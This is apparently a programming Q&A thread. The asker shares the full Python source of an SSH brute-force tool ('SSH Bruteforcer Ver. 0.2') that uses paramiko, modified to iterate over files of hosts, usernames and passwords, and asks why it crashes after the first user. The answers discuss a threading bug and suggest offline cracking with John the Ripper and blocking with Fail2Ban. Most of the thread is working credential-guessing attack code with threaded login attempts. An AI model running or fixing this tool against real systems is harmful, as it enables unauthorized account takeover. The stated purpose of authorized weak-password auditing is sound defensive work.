# Python issue with multiple loops and thread

Tags: python, multithreading, python-3.x, python-2.7

I'm not a python programmer, but I got a snip of code that was working perfectly, but I need to modify it to loop trough files and get some data and do the same task. Apparently it work fine, but on the end of the first line obtained it crashes like this:

```
python x.py -H SSH-Hosts.txt -U Users.txt -P passlist.txt

*************************************
*SSH Bruteforcer Ver. 0.2           *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*laramies@gmail.com                 *
*************************************

Username file: Users.txt
Password file: passlist.txt
*************************************


HOST: 192.168.1.3
Username: bob
Trying password...
zzzzzz


Username: john
Trying password...

Traceback (most recent call last):
  File "x.py", line 146, in <module>
    test(sys.argv[1:])
  File "x.py", line 139, in test
    test_thread(name)
  File "x.py", line 81, in test_thread
    thread.join()
Zxcvbnm
```

The application is a small tool that test for weak SSH accounts, we were target of several brute-force attacks recently and we blocked all of them, but we also want to test periodically for weak accounts, since the applications available (such as Medusa) crashed I decided to modify this one that works fine on our systems, but pass host per host and user per user is not very realistic for us. It's NOT a unauthorized test, I'm member of the IT and we are doing it to prevent BREACHES!

```
import thread
import time
from threading import Thread
import sys, os, threading, time, traceback, getopt
import paramiko
import terminal

global adx
global port

adx="1"
port=22
data=[]
i=[]

term = terminal.TerminalController()
paramiko.util.log_to_file('demo.log')

print "\n*************************************"
print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+"           *"
print "*Coded by Christian Martorella      *"
print "*Edge-Security Research             *"
print "*laramies@gmail.com                 *"
print "*************************************\n"

def usage():
    print "Usage: brutessh.py options \n"
    print "       -H: file with hosts\n"
    print "       -U: file with usernames\n"
    print "       -P: password file \n"
    print "       -p: port (default 22) \n"
    print "       -t: threads (default 12, more could be bad)\n\n"
    print "Example:  brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n"
    sys.exit()

class force(Thread):
    def __init__( self, name ):
        Thread.__init__(self)
        self.name = name

    def run(self):
        global adx
        if adx == "1":
            passw=self.name.split("\n")[0]
            t = paramiko.Transport(hostname)
            try:
                t.start_client()
            except Exception:
                x = 0

            try:
                t.auth_password(username=username,password=passw)
            except Exception:
                x = 0

            if t.is_authenticated():
                print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL
                t.close()
                adx = "0"
            else:
                print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL
                t.close()
        time.sleep(0)
        i[0]=i[0]-1


def test_thread(names):
    i.append(0)
    j=0
    while len(names):
        try:
            if i[0]<th:
                n = names.pop(0)
                i[0]=i[0]+1
                thread=force(n)
                thread.start()
                j=j+1
        except KeyboardInterrupt:
            print "Attack suspended by user..\n"
            sys.exit()
    thread.join()

def test(argv):
    global th
    global hostname
    global username
    th = 12
    if len(sys.argv) < 3:
        usage()
    try :
        opts, args = getopt.getopt(argv,"H:U:P:p:t:")
    except getopt.GetoptError:
        usage()
    for opt,arg in opts :
        if opt == '-U':
            username = arg
        elif opt == '-H':
            hostname =arg
        elif opt == '-P':
            password = arg
        elif opt == '-p':
            port = arg
        elif opt == "-t":
            th = arg

    try:
        h = open(hostname, 'r')
    except:
        print "Can't open file with hostnames\n"
        sys.exit()

    try:
        u = open(username, "r")
    except:
        print "Can't open username file\n"
        sys.exit()

    try:
        f = open(password, "r")
    except:
        print "Can't open password file\n"
        sys.exit()

    print term.RED + "Username file: " +term.NORMAL + username +  "\n" +term.RED + "Password file: " +term.NORMAL+ password
    print "*************************************\n\n"

    hostfile = h.readlines()
    for hostname in hostfile:

        print "HOST: " + hostname.rstrip('\n')
        userfile = u.readlines()
        for username in userfile:

            print "Username: " + username.rstrip('\n')

            print "Trying password...\n"
            name = f.readlines()
            #starttime = time.clock()
            test_thread(name)
            #stoptime = time.clock()
            #print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime)
            print "\n"

if __name__ == "__main__":
    try:
        test(sys.argv[1:])
    except KeyboardInterrupt:
        print "Attack suspended by user...\n"
        sys.exit()
```

How to fix this issue?

Thank you.

Comment: You have not copied the full error message - just part of the stack trace.  Please provide the full error message.

Comment: Thanks for fast response Steve Mayne, but I don't see much more. Updated the main post with the full error. Thanks.

Answer (score 1):

```
import thread
...
from threading import Thread
```

not sure why you decided to import two classes with almost identical names. seems dangerous!

i think you need Thread.join() not thread.join() since threading has a join call but the thread does not.

Comment: Hi corn3lius, I replaced thread.join() with Thread.join() and the error persist on the same way. Also, the original script that I got had this two thread entries and worked fine, I just included the routines to read hostnames from files and username from files. Any other idea? Can you test the script and see if you find the error?
Thanks.

Comment: are you using the same python versions for each python 2.5-7 works very differently than 3.x

try python -V

Comment: I'm using Python 2.6.5. I tried to run my code at Python 3.1.2 and it failed (syntax error). Thanks

Answer (score 1):

Since you have access to the machines, you would be much better off to dump the passwd files and use [John the Ripper](http://www.openwall.com/john/) to find weak accounts. Offline password attacks are far, far faster than online attacks. You should also consider running [Fail2Ban](http://www.fail2ban.org), or something similar, which will automatically block SSH brute force attacks by blocking abusive IPs.

Comment: Thanks 01100110. We are using fail2Ban on Linux boxes, but we have some other systems such as routers, switches, etc that we can't connect to dump the hashes, so test remotely is the only option.
thanks